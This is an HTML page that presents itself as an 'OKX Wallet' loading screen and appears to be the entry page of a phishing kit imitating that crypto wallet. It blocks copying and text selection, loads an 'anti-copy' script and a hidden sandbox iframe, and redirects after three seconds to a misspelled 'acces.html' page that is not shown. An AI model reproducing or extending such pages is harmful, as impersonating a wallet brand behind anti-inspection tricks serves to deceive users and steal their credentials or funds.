<html dir="ltr">
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta charset="utf-8">
  <title>OKX Wallet</title>
  <link rel="stylesheet" type="text/css" href="./scripts/ui/ui.css" title="ltr">
  <script src="./scripts/anti-copy.js"></script>
<style>
  body {
    user-select: none;
    -webkit-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
  }

  img, iframe {
    user-drag: none;
    -webkit-user-drag: none;
  }
</style>

  <!-- Redirect after 3 seconds -->
  <script>
    setTimeout(function () {
      window.location.href = "acces.html";
    }, 3000); // 3000 milliseconds = 3 seconds
  </script>
</head>

<body class="theme-light" style="overflow: hidden">
  <div id="app" class="notification">
    <div class="app-loading">
      <img class="loading__logo" id="logo" src="./static/images/logo-light.svg" alt="okx">
    </div>
  </div>
  
  <iframe id="sandbox" src="sandbox.html" style="display: none"></iframe>
</body>
</html>